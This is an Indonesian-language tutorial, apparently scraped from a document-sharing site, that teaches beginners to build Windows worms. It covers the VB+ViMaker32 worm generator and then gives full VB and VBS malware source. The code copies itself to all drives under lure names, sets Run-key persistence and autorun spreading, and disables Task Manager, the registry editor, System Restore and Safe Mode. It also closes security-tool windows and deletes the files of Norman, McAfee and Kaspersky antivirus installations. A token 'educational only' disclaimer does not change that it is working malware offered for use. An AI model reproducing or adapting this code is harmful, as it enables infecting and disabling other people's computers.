Anda di halaman 1dari 18

1 Tulisan ini dibuat untuk para newbie yang ingin tahu, dan mencoba sesuatu hal yang baru

dan cukup menyenangkan dan mengasikanhe..he Oke, tanpa banyak cangcingcong.nyak..babeh, mari kita mulai dengan Black Project yang akan kita ciptakan, siap.????? Oke kita mulai.. Tapi sebelumnya ada yang tau VB+Vimaker32 ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah gaulnya GPLLY (ga pake lama la yaw) Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan pengaturan yang kita kasih lho.), so buat para newbie yang pengen jadi #VM (Virus Maker bo!) bisa pake ni program buat belajar. Tapi Cuma buat belajar lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu pengetahuan, (Itu kata pembuatnya.) Oke dech langsung aj kali ye bis cape ngomong terus dari tadi ga mulai-mulai neh Tapi sebelum kita memulai membuat Black Project dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang semuanya bisa didownload di dapur kalian masing-masing: Sebuah gelas yang berisi air panas lengkap dengan sendoknya. Satu sachet cappuccino rasa apa saja yang belum kadaluwarsa, klo ini bisa didownload di warung terdekat Cemilan, kalo bisa yang enak dan ga mengandung lemak. Hati, Pikiran dan niat yang tulus dan ikhlas untuk menanggung segala macam akibat dan resiko yang terjadi apabila kesalahan atau ketidaksengajaan yang menyebabkan worm yang dibuat menjadi raja dikomputer sendiri (sejenis senjata makan tuan gtu) Sekarang benar-benar mulai deh, setelah didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan Ctrl+M di keyboard. Hasilnya seperti gambar dibawah ini. Tampilan VB+Vimaker32 RC 03 : Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gt. Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he Berikut tampilan Registry Action Selector : Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gt. Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik -1

1 Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he Berikut tampilan Registry Action Selector : angan lupa icon virusnya juga bisa diubah, untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons Source\Folder\Folder001.ico Terdapat banyak pilihan icon yang disediakan didalam folder Icons Source, so tinggal pilih aja Terakhir dan merupakan saat yang ditunggu-tunggu adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang dideteksi maka Black Project yang kita buat bisa langsung dicompile. Tekan F9 untuk mengcompile project dan sebuah pesan peringatan akan muncul dan menanyakan apakah proses compile akan dilajutkan, baca dulu semua konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan langsung dicompile menjadi file executable (.exe) ile hasil compile memang cukup besar karena tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat ber-Virus Maker xxx Belajar buat virus Ingin tahu gimana membuat virus pakai vb. ikuti tutorial berikut ini: Virus ini cuman menggandakan dirinya secara berulang ulang,Kalo dibuka akan mengcopy dirinya 2 kali,terus-menerus,memberi penamaan pada dirinya sesuai nomor yang diacak,dan mendaftarin dirinya ke Register.bisa ditambahin kode-kode lain supaya lebih mantap,seperti block task: manager,msconfig,dsb.Mungkin ini kelihatan biasa aja,aq cuman ingin bagi-bagi ilmu aja,maaf ya.. kalo gak bisa gasih lebih..ini codenya : Private Sub Form_Load() On Error Resume Next KopiSusu DaftarinKeRegister End Sub Public Function Pengacakan(ByVal Low As Long, ByVal High As Long) As Long Randomize Pengacakan = Int((High - Low + 1) * Rnd) + Low End Function Private Sub KopiSusu() On Error Resume Next X2 = 0 Do Until X2 = 2 X = Pengacakan(0, 999999999) FileCopy App.Path & "\" & App.EXEName & ".exe", App.Path & "\" & App.EXEName & X & ".exe" Shell App.Path & "\" & App.EXEName & X & ".exe" X2 = X2 + 1 Loop End Sub Private Sub DaftarinKeRegister() X3 = Pengacakan(0, 999999999) FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\plaige" & X3 & ".exe" Dim RegKey -2

1 Set RegKey = CreateObject("WScript.Shell") RegKey.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\plaige", "C:\windows\plaige" & X3 & ".exe" End Sub Virus Kikuk yang dibuat dengan VBS virus ni bukan jahat, tapi usil yaitu mengganti tulisan mycomputer, recyle bin, my network dan lain-lain. virus ini juga akan menginfeksi file ke FD. juga secara otomatis autorun dengan membuat file autorun.inf Berikut adalah source codenya (karena dibuat pakai vbs amaka bisa langsung di lihat source codenya.... Explorer\Main\Window Title","Your Computer Has been Infected By Virus : Paray Rontox" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\International\s1159","Kikuk_666_Kikuk" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\International\s2359","Kikuk_Kikuk_666" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\Shell Icon Size","128" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\MinWidth","-100" ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions ", "1", "REG_DWORD" ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD" ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTo ols", "1", "REG_DWORD" ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity", "2" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickHeight", "6000" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed", "6000" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickWidth", "6000" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Keyboard\KeyboardDelay", "0" ParayCity.regwrite "HKEY_CURRENT_USER\Control Panel\Keyboard\KeyboardSpeed", "36" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD" ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD" ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD" ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckp ointing", "1", "REG_DWORD" -3

1 ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD" ParayCity.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Paray@Hacker", rumahgue & "\Kikuk_666_Kikuk.vbs" ParayCity.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ParayRontox", rumahgue & "\Kikuk_666_Kikuk.vbs" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "2", "REG_DWORD" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "0", "REG_DWORD" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHid den", "0", "REG_DWORD" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Text", "bangsat kljsdouiyhifeledfdsl" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Type", "sfgdhtgtygvhgf" ParayCity.regwrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Kikuk_666_Kikuk" ParayCity.regwrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\IntroText","Maaf komputer anda sudah terinfeksi virus Kikuk_666_Kikuk" ParayCity.regwrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\InfoTip","Maaf komputer anda sudah terinfeksi virus Kikuk_666_Kikuk" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C603AEA-1069-A2D7-08002B30309D}\", "Jaringan Kikuk_666_Kikuk" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE03AEA-1069-A2D8-08002B30309D}\", "Kikuk_666_Kikuk" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBAAD25-11D0-98A8-0800361B1103}\", "Dokument Kikuk_666_Kikuk" ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081101B-9F08-00AA002F954E}\", "Tonk Kikuk_666_Kikuk" ParayCity.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HelloParay", rumahgue & "\Kikuk_666_Kikuk_Massage.htm" if check <> 1 then Wscript.sleep 300000 end if loop while check <> 1 -4

1 set sibungul = createobject("Wscript.shell") sibungul.run rumahgue & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

apabila anda lelah memandang dan lelah untuk copy pa VirusVb Untuk virus ni anda membutuhkan 1 form dan 4 Module. Untuk lebih jelasnya silahkan anda lihat coding berikut ini: Private Sub bunuh_Timer() 'proteksi tutup "avg" tutup "anti" tutup "ANSAV" tutup "avast" tutup "asm" tutup "avira" tutup "cillin" tutup "clean" tutup "CONFIRM FILE DELETE" tutup "CONFIRM MULTIPLE FILE DELETE" tutup "compact" tutup "CRC" tutup "debug" tutup "detect" tutup "NOD" tutup "Gasak!!!" tutup "hijack" tutup "INTERNET OPTIONS" tutup "kill" tutup "KILLBOX" tutup "k1ckth3w0rm" tutup "kaspersky" tutup "mcafee" tutup "NVC" tutup "norton" tutup "regis" tutup "Norman" tutup "Ogav" tutup "panda" tutup "POCKET KILLBOX" tutup "proc" tutup "recovery" tutup "remover" tutup "rest" tutup "scan" tutup "system" tutup "System Mechanic" tutup "Setup" tutup "SHOW/KILL RUNNING PROCESS" -5

1 tutup "SYSTEM RESTORE" tutup "superdat" tutup "S m a d A V" tutup "SmadAV" tutup "task" tutup "TKM" tutup "termin" tutup "trojan" tutup "tune" tutup "update" tutup "virus" tutup "vaksin" tutup "WAV" tutup "wash" tutup "walk" tutup "w32"

'selamatkan moral bangsa kick "17tahun" kick "adult" kick "anal" kick "bangbros" kick "bangbus" kick "Bugil" kick "CrystalClear" kick "Doggy Style" kick "amit-amit" kick "hentai" kick "hottie" kick "kiara kener" kick "Kama Sutra" kick "lalatx" kick "miyabi" kick "masturb" kick "naughty" kick "nude" kick "naked" kick "nana1_chunk" kick "pussy" kick "porn" kick "sex" kick "scandal" kick "spy cam" kick "SQ Evolution" kick "Three Some" kick "webcam show" kick "xxx" Call ganda Call Racuni_Registry -6

1 Call proteksi_folder End Sub Private Sub Form_Load() Y4D0Y666.Hide App.TaskVisible = False If App.PrevInstance Then End 'ganda di folder windows dengan nama dafault.bat CopyFile App.Path & "\" & App.EXEName & ".exe", GetWindowsPath & "\" & "default.bat", 0 'ganda di system32 dengan nama login.exe dan autoexec.bat CopyFile App.Path & "\" & App.EXEName & ".exe", GetSystemPath & "\" & "login.exe", 0 CopyFile App.Path & "\" & App.EXEName & ".exe", GetSystemPath & "\" & "autoexec.bat", 0 'ganda di mydocument dengan nama Kerispatih On Da Stage.exe CopyFile App.Path & "\" & App.EXEName & ".exe", GetSpecialfolder(CSIDL_PERSONAL) & "\" & "KerisPatih On Da Stage.exe", 0

Call ganda Call Racuni_Registry Call proteksi_folder Call Kill_antivirus End Sub Private Function Racuni_Registry() On Error Resume Next 'Disable System Restore CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore", "DisableConfig", 1 CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore", "DisableSR", 1 CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Installer", "LimitSystemRestoreCheckpointing", 1 CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Installer", "DisableMSI", 1 'Ubah tipe file *.exe jadi Winamp media file CreateStringValue HKEY_CLASSES_ROOT, "exefile", REG_SZ, "", "Winamp media file" 'Manipulasi Internet Explorer CreateStringValue HKEY_CURRENT_USER, "Software\Microsoft\Internet Explorer\Main\", REG_SZ, "Window Title", "..:: YaDoY666 [WuZ HeRe] ::.." -7

1 CreateStringValue HKEY_CURRENT_USER, "Software\Microsoft\Internet Explorer\Main\", REG_SZ, "Start Page", GetSpecialfolder(CSIDL_PERSONAL) & "\" & "My Pictures\About.htm" 'auto run virus CreateStringValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run\", REG_SZ, "User-Login", GetSystemPath & "login.exe" CreateStringValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run\", REG_SZ, "Norton", GetWindowsPath & "default.bat" 'Disable Folder Options CreateDwordValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\", "NoFolderOptions", 1 CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\", "NoFolderOptions", 1 'atur registry agar file dengan yang disembunyikan tidak tampil CreateDwordValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "HideFileExt", 1 CreateDwordValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "Hidden", 0 CreateDwordValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "ShowSuperHidden", 0 CreateDwordValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "HideFileExt", 1 CreateDwordValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "Hidden", 0 CreateDwordValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "ShowSuperHidden", 0 'Atur registry agar tidak bisa masuk safe mode DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "dmboot.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "dmio.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "dmload.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "sermouse.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "sr.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "vga.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "vgasave.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "dmboot.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "dmiot.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "rdpcdd.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "rdpdd.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "rdpwd.sys" -8

1 DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "sermouse.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "sr.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "tdpipe.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "tdtcp.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "vga.sys" DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "vgasave.sys" End Function Private Function ganda() Dim ictr As Integer Dim sAllDrives As String Dim sDrive As String sDrive = "" For ictr = 66 To 90 sDrive = Chr(ictr) & ":\" If GetDriveType(sDrive) = 3 Or GetDriveType(sDrive) = 2 Then CopyFile App.Path & "\" & App.EXEName & ".exe", sDrive & "I Love You.exe", 0 CopyFile App.Path & "\" & App.EXEName & ".exe", sDrive & "cewe_bandel.exe", 0 End If Next End Function Private Sub Form_Unload(Cancel As Integer) Shell GetSystemPath & "\" & "login.exe" End Sub Private Sub proteksi_folder() On Error Resume Next SetAttr GetWindowsPath, vbNormal SetAttr GetWindowsPath & "\" & "desktop.ini", vbNormal Kill GetWindowsPath & "\" & "desktop.ini" Open GetWindowsPath & "\" & "desktop.ini" For Output As #1 Print #1, "[.ShellClassInfo]" Print #1, "CLSID={C96401CC-0E17-11D3-885B-00C04F72C717}" Close #1 SetAttr GetWindowsPath & "\" & "desktop.ini", vbHidden SetAttr GetWindowsPath, vbSystem End Sub Sub Kill_antivirus() -9

1 On Error Resume Next 'bunuh antivirus Norman If Folder_Exist("C:\Norman") = True Then prog_AntiVir = Array( _ "C:\Norman\Bin", _ "C:\Norman\Download", _ "C:\Norman\Nse\Bin", _ "C:\Norman\Nvc\Bin", _ "C:\Norman\Nvc\Config", _ "C:\Norman\Qtn\Bin" _ ) SetAttr "C:\Norman", vbNormal For p = 0 To 3 Kill prog_AntiVir(p) & "\*.exe" Kill prog_AntiVir(p) & "\*.dll" Kill prog_AntiVir(p) & "\*.zip" Kill prog_AntiVir(p) & "\*.*" Next p RmDir "C:\Norman" End If 'bunuh antivirus Norman kalo ada di dalam direcktory Program Files If Folder_Exist("C:\Program Files\Norman") = True Then prog_AntiVir = Array( _ "C:\Program Files\Norman\Bin", _ "C:\Program Files\Norman\Download", _ "C:\Program Files\Norman\Nse\Bin", _ "C:\Program Files\Norman\Nvc\Bin", _ "C:\Program Files\Norman\Nvc\Config", _ "C:\Program Files\Norman\Qtn\Bin" _ ) SetAttr "C:\Program Files\Norman", vbNormal For p = 0 To 3 Kill prog_AntiVir(p) & "\*.exe" Kill prog_AntiVir(p) & "\*.dll" Kill prog_AntiVir(p) & "\*.zip" Kill prog_AntiVir(p) & "\*.*" Next p RmDir "C:\Program Files\Norman" End If 'bunuh antivirus McAfee If Folder_Exist("C:\Program Files\McAfee") = True Then prog_AntiVir = Array( _ "C:\Program Files\McAfee\McAfee Firewall", _ "C:\Program Files\McAfee\McAfee VirusScan", _ "C:\Program Files\McAfee\McAfee VirusScan\Backups\DatBackup", _ "C:\Program Files\McAfee\McAfee VirusScan\Backups\EngineBackup", _ "C:\Program Files\McAfee\McAfee VirusScan\Res00", _ "C:\Program Files\McAfee\VirusScan Wireless" _ - 10

1 ) SetAttr "C:\Program Files\McAfee", vbNormal For p = 0 To 3 Kill prog_AntiVir(p) & "\*.exe" Kill prog_AntiVir(p) & "\*.dll" Kill prog_AntiVir(p) & "\*.zip" Kill prog_AntiVir(p) & "\*.*" Next p RmDir "C:\Program Files\McAfee" End If 'bunuh antivirus McAfee If Folder_Exist("C:\Program Files\Kaspersky Lab") = True Then prog_AntiVir = Array( _ "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro", _ "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\Policy", _ "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\Report", _ "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\Infected" _ ) SetAttr "C:\Program Files\Kaspersky Lab", vbNormal For p = 0 To 3 Kill prog_AntiVir(p) & "\*.exe" Kill prog_AntiVir(p) & "\*.dll" Kill prog_AntiVir(p) & "\*.zip" Kill prog_AntiVir(p) & "\*.vxd" Kill prog_AntiVir(p) & "\*.*" Next p RmDir "C:\Program Files\Kaspersky Lab" End If

End Sub Module BUNUH Public Declare Function GetForegroundWindow Lib "user32" () As Long Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long Public Const WM_CLOSE = &H10

Public Function kick(target As String) Dim H As Long Dim T As String * 255 H = GetForegroundWindow GetWindowText H, T, 255 If InStr(UCase(T), UCase(target)) > 0 Then - 11

1 SendMessage H, WM_CLOSE, 0, 0 End If End Function Module FILE Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long Public Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long Public Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Declare Function CreateDirectory Lib "kernel32" Alias "CreateDirectoryA" (ByVal lpPathName As String, lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long Public Declare Function DeleteFile Lib "kernel32.dll" Alias "DeleteFileA" (ByVal lpFileName As String) As Long Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long Public Const FILE_ATTRIBUTE_SYSTEM = &H4 Public Const FILE_ATTRIBUTE_READONLY = &H1 Public Const FILE_ATTRIBUTE_HIDDEN = &H2 Public Const FILE_ATTRIBUTE_DIRECTORY = &H10 Public Const FILE_ATTRIBUTE_ARCHIVE = &H20 Public Const FILE_ATTRIBUTE_NORMAL = &H80 Public Type SHITEMID cb As Long abID As Byte End Type Public Type ITEMIDLIST mkid As SHITEMID End Type Public Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type Enum SFolder CSIDL_DESKTOP = &H0 'menunjukkan folder virtual yang menyatakan root untuk semua namespace (/Desktop) CSIDL_PROGRAMS = &H2 'menunjukkan folder sistem yang berisi grup program user (/Programs) CSIDL_CONTROLS = &H3 'menunjukkan folder virtual yang berisi ikon-ikon aplikasi Control Panel (/Control Panel) - 12

1 CSIDL_PRINTERS = &H4 'menunukkan folder virtual yang berisi printer-printer yang diinstall (/Printers) CSIDL_PERSONAL = &H5 'menunjukkan folder sistem yang digunakan untuk menyimpan dokumen umum user (/My Document) CSIDL_FAVORITES = &H6 'menunjukkan folder yang berisi item-item favorite user (/Favorites) CSIDL_STARTUP = &H7 'menunjukkan folder yang berisi grup program StartUp user (/Startup) CSIDL_RECENT = &H8 'menunjukkan folder sistem yang berisi dokumen-dokumen yang sering digunakan (/Recent) CSIDL_SENDTO = &H9 'menunjukkan folder yang berisi item menu Send To (/Send To) CSIDL_BITBUCKET = &HA 'menunjukkan folder sistem yang berisi objek file pada RecycleBin user (/Recycle Bin) CSIDL_STARTMENU = &HB 'menunjukkan folder sistem yang berisi item-item menu Start (/StartMenu) CSIDL_DESKTOPDIRECTORY = &H10 'menunjukkan folder sistem yang dapatkan digunakan untuk menyimpan objek file secara fisik pada desktop CSIDL_DRIVES = &H11 'menunjukkan folder yang berisi segala sesuatu pada komputer lokal (/My Computer) CSIDL_NETWORK = &H12 'menunjukkan folder yang berisi objek link yang kemungkinan ada pda folder virtual My Network Places (/My Network Places) CSIDL_NETHOOD = &H13 'menunjukkan folder yang menyatakan root dari hierarki namespace network (/NetHood) CSIDL_FONTS = &H14 'menunjukkan folder yang berisikan font (/FONT) CSIDL_TEMPLATES = &H15 'menunjukkan folder yang digunakan untuk menyimpan dokumen template (/Template) End Enum 'Get special folder Public Function GetSpecialfolder(JenisFolder As SFolder) As String Dim r As Long Dim IDL As ITEMIDLIST 'get special folder r = SHGetSpecialFolderLocation(100, JenisFolder, IDL) If r = NOERROR Then 'create buffer Path$ = Space$(512) 'Get path from IDList(IDL) r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$) 'Remove chr$(0) GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1) Exit Function End If GetSpecialfolder = "" End Function 'Get System Path Public Function GetSystemPath() As String On Error Resume Next Dim Buffer As String * 255 Dim x As Long x = GetSystemDirectory(Buffer, 255) GetSystemPath = Left(Buffer, x) & "\" End Function - 13

